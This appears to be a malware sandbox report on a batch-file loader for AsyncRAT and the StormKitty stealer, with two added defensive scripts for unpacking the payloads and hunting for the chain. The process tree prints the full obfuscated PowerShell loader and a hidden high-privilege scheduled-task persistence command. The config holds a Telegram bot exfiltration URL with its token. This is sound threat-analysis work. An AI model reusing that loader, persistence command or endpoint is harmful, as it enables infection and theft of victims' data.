Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    31-12-2024 16:22

General

  • Target

    po.bat

  • Size

    345KB

  • MD5

    25be610e8e3814d3a218e6ab74513af2

  • SHA1

    e94d8a8adbf9b42ee206ae0cea46b2d24225e9fc

  • SHA256

    b1d4310181ae2f48593c1fe2c68f71e6dd39c5f64254fd21304debb944bd1b11

  • SHA512

    201988cc2a36782c841e258160df4ec8d6ecafb8534d2868edbfd827de10e671b38df849f7c97686201fe0d6fb69d147d42b642f4cb6224705eb2a586b2c0235

  • SSDEEP

    6144:GR5FF+fw1uneHT10sG94hEHdiYOGgmNUgd/RZkOXTGKiTGtiIljFiqzpQJK:05j1unET1zG4E9FgmNUgd/PkOXniTeQw

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7783849752:AAGmjKBCU097MimSymLmRKxeBKFEEvQt3kM/sendMessage?chat_id=6795436266

Note: the three loopback entries (127.0.0.1 on 6606, 7707 and 8808) are the placeholder hosts of an unmodified AsyncRAT default configuration and give a defender nothing to block. The only live endpoint in this config is the Telegram bot API URL, which carries the bot token and the destination chat_id in clear text.

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • A potential corporate email address has been identified in the URL: WorldWindProResultsDate2024123142242PMSystemWindows10Pro64BitUsernameAdminCompNameHGNBWBGWLanguageenUSAntivirusNotinstalledHardwareCPU12thGenIntelRCoreTMi512400GPUMicrosoftBasicDisplayAdapterRAM16154MBHWIDUnknownPowerNoSystemBattery1Screen1280x720NetworkGatewayIP10.127.0.1InternalIP10.127.1.46ExternalIP181.215.176.83BSSID0a07a41c5f8cDomainsinfoBankLogsNodataCryptoLogsNodataFreakyLogsNodataLogsBookmarks5SoftwareDeviceWindowsproductkeyDesktopscreenshotFileGrabberDatabasefiles6TelegramChannel@XSplinter

    This signature is a false positive triggered by the '@' in "TelegramChannel@XSplinter". The matched string is not an email address but the body of the StormKitty summary (OS, hostname, hardware, internal and external IP, BSSID, counts of harvested logs and grabbed files) that the stealer posts to the Telegram bot API sendMessage endpoint listed under C2; the surrounding signatures (external IP lookup, geolocation lookup, Wi-Fi discovery) are the collection steps that fill it in.
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops desktop.ini file(s) 8 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. In this run netsh.exe is only invoked as "netsh wlan show profile" and "netsh wlan show networks mode=bssid" (see the process tree); no helper DLL is added, so these hits are Wi-Fi discovery (T1016.002) by the stealer, not observed T1546.007 persistence.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\po.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WXDDP3eCzIksUfspz4NHfGBtlF74ozognZ5SfO7Zxkw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('23MdSkcOxWCbD/Koba3sUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eeiaa=New-Object System.IO.MemoryStream(,$param_var); $IalBQ=New-Object System.IO.MemoryStream; $RfJeN=New-Object System.IO.Compression.GZipStream($Eeiaa, [IO.Compression.CompressionMode]::Decompress); $RfJeN.CopyTo($IalBQ); $RfJeN.Dispose(); $Eeiaa.Dispose(); $IalBQ.Dispose(); $IalBQ.ToArray();}function execute_function($param_var,$param2_var){ $HWfkf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TJqdd=$HWfkf.EntryPoint; $TJqdd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\po.bat';$mWxXN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\po.bat').Split([Environment]::NewLine);foreach ($QlAdB in $mWxXN) { if ($QlAdB.StartsWith(':: ')) { $LjOms=$QlAdB.Substring(3); break; }}$payloads_var=[string[]]$LjOms.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_899_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_899.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:576
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_899.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_899.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1756
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WXDDP3eCzIksUfspz4NHfGBtlF74ozognZ5SfO7Zxkw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('23MdSkcOxWCbD/Koba3sUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eeiaa=New-Object System.IO.MemoryStream(,$param_var); $IalBQ=New-Object System.IO.MemoryStream; $RfJeN=New-Object System.IO.Compression.GZipStream($Eeiaa, [IO.Compression.CompressionMode]::Decompress); $RfJeN.CopyTo($IalBQ); $RfJeN.Dispose(); $Eeiaa.Dispose(); $IalBQ.Dispose(); $IalBQ.ToArray();}function execute_function($param_var,$param2_var){ $HWfkf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TJqdd=$HWfkf.EntryPoint; $TJqdd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_899.bat';$mWxXN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_899.bat').Split([Environment]::NewLine);foreach ($QlAdB in $mWxXN) { if ($QlAdB.StartsWith(':: ')) { $LjOms=$QlAdB.Substring(3); break; }}$payloads_var=[string[]]$LjOms.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops desktop.ini file(s)
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1196
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
              6⤵
              • System Network Configuration Discovery: Wi-Fi Discovery
              • Suspicious use of WriteProcessMemory
              PID:2268
              • C:\Windows\system32\chcp.com
                chcp 65001
                7⤵
                  PID:1552
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profile
                  7⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:3024
                • C:\Windows\system32\findstr.exe
                  findstr All
                  7⤵
                    PID:4200
                • C:\Windows\SYSTEM32\cmd.exe
                  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5108
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    7⤵
                      PID:2456
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show networks mode=bssid
                      7⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:4836
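
The two powershell.exe command lines above (PIDs 112 and 1196) are the entire loader: read the .bat file itself, keep the first line that begins with ':: ' (a batch comment, so cmd.exe never evaluates it), split the rest on '\' into two blobs, and for each one base64-decode, AES-256-CBC decrypt with the hard-coded key and IV, gunzip, and pass the bytes to [Reflection.Assembly]::Load. The method names are hidden by string reversal: 'daoL'[-1..-4] is Load, 'gnirtS46esaBmorF'[-1..-16] is FromBase64String and 'txeTllAdaeR'[-1..-11] is ReadAllText. The script below is an added example, not tooling from the sandbox or code from the sample's author: it walks the same chain with the same .NET calls but writes the decrypted payloads to disk and hashes them instead of loading them. The sample path and output directory are arguments you supply; the key and IV defaults are the values from the command line above and should be overridden for a sample whose one-liner carries different ones.

```powershell
<#
  extract-bat-loader.ps1 (added example; not from the report or the sample author)
  Statically unpacks the ':: <b64>\<b64>' payload line of a .bat loader of the
  kind shown above. Nothing is executed: the decrypted assemblies are written
  to -OutDir for analysis. Run it on an isolated analysis host.
#>
param(
    [Parameter(Mandatory = $true)][string]$BatPath,                # e.g. .\po.bat
    [string]$OutDir = (Join-Path $PWD 'extracted'),
    # Defaults are the key/IV from the sampled command line (base64 of 32 + 16 bytes).
    [string]$KeyB64 = 'WXDDP3eCzIksUfspz4NHfGBtlF74ozognZ5SfO7Zxkw=',
    [string]$IvB64  = '23MdSkcOxWCbD/Koba3sUw=='
)

# AES-CBC/PKCS7 with the loader's parameters: same API, no Assembly.Load afterwards.
function Unprotect-Blob {
    param([byte[]]$Cipher, [byte[]]$Key, [byte[]]$Iv)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = $Key
        $aes.IV      = $Iv
        $dec = $aes.CreateDecryptor()
        try     { return ,$dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

# The decrypted bytes are a gzip stream; inflate it fully into memory.
function Expand-Gzip {
    param([byte[]]$Data)
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    try     { $gz.CopyTo($out); return ,$out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

# The loader reads its own file, keeps the first line starting with ':: '
# (a batch comment, so cmd.exe never sees the payload) and splits it on '\'.
$marker = Get-Content -LiteralPath $BatPath |
          Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
if (-not $marker) { throw "No ':: ' payload line found in $BatPath" }
$blobs = $marker.Substring(3).Split('\')

$key = [Convert]::FromBase64String($KeyB64)
$iv  = [Convert]::FromBase64String($IvB64)
if ($key.Length -ne 32 -or $iv.Length -ne 16) { throw 'Expected a 32-byte key and a 16-byte IV' }
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

$n = 0
foreach ($b64 in $blobs) {
    $n++
    $plain   = Expand-Gzip (Unprotect-Blob -Cipher ([Convert]::FromBase64String($b64)) -Key $key -Iv $iv)
    $outFile = Join-Path $OutDir ('payload{0}.bin' -f $n)
    [System.IO.File]::WriteAllBytes($outFile, $plain)
    # Assembly.Load expects a PE image, so a real payload starts with 'MZ'.
    $isPe = ($plain.Length -gt 2 -and $plain[0] -eq 0x4D -and $plain[1] -eq 0x5A)
    [pscustomobject]@{
        Payload = $n
        Bytes   = $plain.Length
        PE      = $isPe
        SHA256  = (Get-FileHash -LiteralPath $outFile -Algorithm SHA256).Hash
        Path    = $outFile
    }
}
```

Usage: .\extract-bat-loader.ps1 -BatPath .\po.bat. Two blobs are expected, matching the two execute_function calls in the one-liner (the first is invoked with $null, the second with an empty string[]); the report attributes one payload to AsyncRAT and one to StormKitty, and which extracted file is which is for the analyst to confirm from the .NET metadata and strings. A payload that does not start with MZ means the key, IV or line format differs from this sample and the defaults need to be taken from that sample's own command line.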

        Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Local\858b037c9991c1287bcbc54bdc9c6d9d\msgid.dat

          Filesize

          1B

          MD5

          cfcd208495d565ef66e7dff9f98764da

          SHA1

          b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

          SHA256

          5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

          SHA512

          31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

        • C:\Users\Admin\AppData\Local\8648dd9006ccc12c10d4ef0a8c8cd3b5\Admin@HGNBWBGW_en-US\System\Process.txt

          Filesize

          2KB

          MD5

          b438e4a0d772d94bf96c3243a0df4383

          SHA1

          9465de57c99716655278ee9a76d82fe8fad5f9e2

          SHA256

          aa0fbe1de03d52ff0a42c14e42e8e2c6ef237a6c1968b6e2247c1c3209ed57ce

          SHA512

          f2f7dbe29b4b2d06fac2d06a7b5644db6441c7f93b3ad8d8a0b84aa3dc0d3fa859cf4f047eae0fa7992ff1a1d936b62460aaef7e1e5fe69ca6e83d55e424a2c9

        • C:\Users\Admin\AppData\Local\8648dd9006ccc12c10d4ef0a8c8cd3b5\Admin@HGNBWBGW_en-US\System\Process.txt

          Filesize

          3KB

          MD5

          3d7eb2443ed447df8a16bf409ec39014

          SHA1

          93ad136d29119641c24162c8210b8117837efa8f

          SHA256

          e8861e4c0c3484540b7c1de6362a035fa9f777a54fdef116aa3c022c83b820f5

          SHA512

          1d16afc878ed977fea3c9bc1239af2c1a0522f0f29841f0510ccea176ca10fef33aaf2b83c3775681acc2ebdb778a8c6a2fb3423d90d406295ad4fb6d2ae2e9b

        • C:\Users\Admin\AppData\Local\8648dd9006ccc12c10d4ef0a8c8cd3b5\Admin@HGNBWBGW_en-US\System\Process.txt

          Filesize

          4KB

          MD5

          297df5930891848e3bf28b29cf16540e

          SHA1

          cdcdd635f3f41ef7e3176416d42e97867fb2892f

          SHA256

          6a90194d862f1f2768d59185e8c2eab1c16b4f3370154dd9a69ffd44198fb765

          SHA512

          7b8aece9b2242bbf7441b04415dfe491dee9284aad9e298b476133d73bb652496208c17bf7de0d42749423afc8557006f82f2503eb7dd34ce4c3fa90926aeb1c

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          661739d384d9dfd807a089721202900b

          SHA1

          5b2c5d6a7122b4ce849dc98e79a7713038feac55

          SHA256

          70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

          SHA512

          81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          59e72d5302c306143345e8298d925ba8

          SHA1

          78c0a2e28a58b4dd3dc53c2a94cb10cf9bc20e24

          SHA256

          ab87b07ec3ba128e25f3a690e5ec78dc0c0ae5f5ce01325badc0fb0e63281217

          SHA512

          777a30da4f1e81fbc74ef68d7c35def1ef4204e876477ff16ee23ffccf245f95ff826844795c032cb8eda698f02c3d6a7595ca377331704f43af26f6ac824f3c

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fuyeprcw.ez0.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\startup_str_899.bat

          Filesize

          345KB

          MD5

          25be610e8e3814d3a218e6ab74513af2

          SHA1

          e94d8a8adbf9b42ee206ae0cea46b2d24225e9fc

          SHA256

          b1d4310181ae2f48593c1fe2c68f71e6dd39c5f64254fd21304debb944bd1b11

          SHA512

          201988cc2a36782c841e258160df4ec8d6ecafb8534d2868edbfd827de10e671b38df849f7c97686201fe0d6fb69d147d42b642f4cb6224705eb2a586b2c0235

        • C:\Users\Admin\AppData\Roaming\startup_str_899.vbs

          Filesize

          115B

          MD5

          b52a50d4970f4906c23bb743dd4713b2

          SHA1

          b568f1d0cc97b7bb90b4df540eeded5adacb3d47

          SHA256

          85df88a9f0b897917441285e1220d63beae23fd6d9aa75ccb2e1c7a05d3464d6

          SHA512

          93559599842eb54ba2abb095d7d3777579d9e2f47bc37de85f709548e25123264098a12c974e87f8f56359d19d1885048cfebe6c913b4ce5071a139309fa8302

        • memory/112-50-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

        • memory/112-14-0x000001E2ADEF0000-0x000001E2ADF34000-memory.dmp

          Filesize

          272KB

        • memory/112-8-0x000001E2AD2C0000-0x000001E2AD2E2000-memory.dmp

          Filesize

          136KB

        • memory/112-13-0x000001E2AD310000-0x000001E2AD318000-memory.dmp

          Filesize

          32KB

        • memory/112-11-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

        • memory/112-0-0x00007FFEAA393000-0x00007FFEAA395000-memory.dmp

          Filesize

          8KB

        • memory/112-12-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

        • memory/576-27-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

        • memory/576-30-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

        • memory/576-26-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

        • memory/576-16-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

        • memory/1196-51-0x000001F173590000-0x000001F1735C2000-memory.dmp

          Filesize

          200KB

        • memory/1196-49-0x000001F15A7C0000-0x000001F15A804000-memory.dmp

          Filesize

          272KB

        • memory/1196-198-0x000001F173FC0000-0x000001F173FCA000-memory.dmp

          Filesize

          40KB

        • memory/1196-204-0x000001F173FD0000-0x000001F173FE2000-memory.dmp

          Filesize

          72KB
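
Everything needed to hunt for this chain on other hosts is in the report: the file hashes under Downloads (the dropped startup_str_899.bat hashes identically to po.bat), the startup_str_<n>.vbs/.bat pair written to %AppData%\Roaming, the RuntimeBroker_startup_<n>_str scheduled task registered hidden and with -RunLevel Highest at logon, the netsh wlan profile and BSSID enumeration, the reversed-string obfuscation in the PowerShell one-liner, and the api.telegram.org exfiltration endpoint. The script below is an added example (not from the report or the sandbox vendor) that checks a single Windows host for each of those. It assumes an elevated prompt for the Security and PowerShell operational logs, that process command-line auditing (4688) or Sysmon (EID 1) is in place for the process check, and that script block logging (4104) is enabled for the one-liner check; the numeric suffix in the file and task names is matched as a pattern rather than as the constant 899.

```powershell
<#
  hunt-asyncrat-bat-loader.ps1 (added example; not part of the sandbox report)
  Checks one Windows host for the artifacts of the chain above. Run elevated.
  Self-exclusion marker for the 4104 check: HUNT-SELF-TAG-7e1c
#>
$Findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Kind, [string]$Detail) {
    $Findings.Add([pscustomobject]@{ Kind = $Kind; Detail = $Detail })
}

# 1. SHA256 values from the Downloads section (one hash covers po.bat and its dropped copy).
$KnownSha256 = @(
    'b1d4310181ae2f48593c1fe2c68f71e6dd39c5f64254fd21304debb944bd1b11',  # po.bat / startup_str_899.bat
    '85df88a9f0b897917441285e1220d63beae23fd6d9aa75ccb2e1c7a05d3464d6'   # startup_str_899.vbs
)

# 2. Dropped files: .bat/.vbs/.cmd directly inside every user's Roaming AppData,
#    flagged on a known hash, on the loader's ':: <b64>\<b64>' payload line, or on the name.
$roamingDirs = Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue |
               ForEach-Object { Join-Path $_.FullName 'AppData\Roaming' } |
               Where-Object { Test-Path -LiteralPath $_ }
foreach ($dir in $roamingDirs) {
    Get-ChildItem -LiteralPath $dir -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -in '.bat', '.vbs', '.cmd' } |
        ForEach-Object {
            $sha = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash.ToLower()
            if ($KnownSha256 -contains $sha) { Add-Finding 'KnownHash' "$($_.FullName) $sha" }
            if ($_.Extension -ne '.vbs' -and
                (Select-String -LiteralPath $_.FullName -Pattern '^:: [A-Za-z0-9+/=]{64,}\\[A-Za-z0-9+/=]{64,}' -Quiet)) {
                Add-Finding 'LoaderBat' $_.FullName
            }
            if ($_.Name -match '^startup_str_\d+\.(vbs|bat)$') { Add-Finding 'DroppedName' $_.FullName }
        }
}

# 3. Scheduled tasks: any action launching a script from AppData, or the task name
#    pattern used here, reported with its RunLevel and Hidden flags.
foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
    foreach ($action in $task.Actions) {
        $cmd = "$($action.Execute) $($action.Arguments)"
        if ($cmd -match '(?i)\\AppData\\(Roaming|Local)\\[^ ]*\.(vbs|bat|cmd|js|ps1)' -or
            $task.TaskName -match '^RuntimeBroker_startup_\d+_str$') {
            Add-Finding 'ScheduledTask' ('{0}: {1} [RunLevel={2}; Hidden={3}]' -f
                $task.TaskName, $cmd.Trim(), $task.Principal.RunLevel, $task.Settings.Hidden)
        }
    }
}

# 4. Process creation (Security 4688 with command-line auditing, or Sysmon EID 1):
#    the netsh wlan profile/BSSID enumeration that followed the stealer's launch.
$procLogs = @(
    @{ LogName = 'Security'; Id = 4688 },
    @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
)
foreach ($filter in $procLogs) {
    Get-WinEvent -FilterHashtable $filter -MaxEvents 20000 -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match '(?i)netsh\s+wlan\s+show\s+(profile|networks\s+mode=bssid)' } |
        ForEach-Object { Add-Finding 'WifiDiscovery' ('{0} {1}/{2}' -f $_.TimeCreated, $_.LogName, $_.Id) }
}

# 5. Script block logging (4104): the reversed-string trick ('daoL'[-1..-4] -join '')
#    and the decrypt -> gunzip -> Assembly.Load chain. This script's own block is
#    skipped via the marker in the header comment.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 20000 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -notmatch 'HUNT-SELF-TAG-7e1c' } |
    Where-Object {
        $_.Message -match "\[-1\.\.-\d+\]\s*-join\s*''" -or
        ($_.Message -match 'TransformFinalBlock' -and $_.Message -match 'GZipStream' -and $_.Message -match '\.EntryPoint')
    } | ForEach-Object { Add-Finding 'ScriptBlock' ('{0} record {1}' -f $_.TimeCreated, $_.RecordId) }

# 6. Exfiltration endpoint: a cached lookup of api.telegram.org stands out on a host
#    where nothing legitimately talks to the Telegram bot API.
Get-DnsClientCache -ErrorAction SilentlyContinue |
    Where-Object { $_.Entry -like '*api.telegram.org*' } |
    ForEach-Object { Add-Finding 'DnsCache' ('{0} -> {1}' -f $_.Entry, $_.Data) }

if ($Findings.Count -eq 0) { 'No indicators of this chain found.' }
else { $Findings | Sort-Object Kind | Format-Table -AutoSize -Wrap }
```

The hash check is the narrowest test and the loader-line, task and script-block checks the widest: a rebuilt sample changes every hash but keeps the ':: ' payload line, the AppData script launched from a hidden highest-privilege task, and the reversed method names, so those are the rules worth keeping after this particular bot token is revoked.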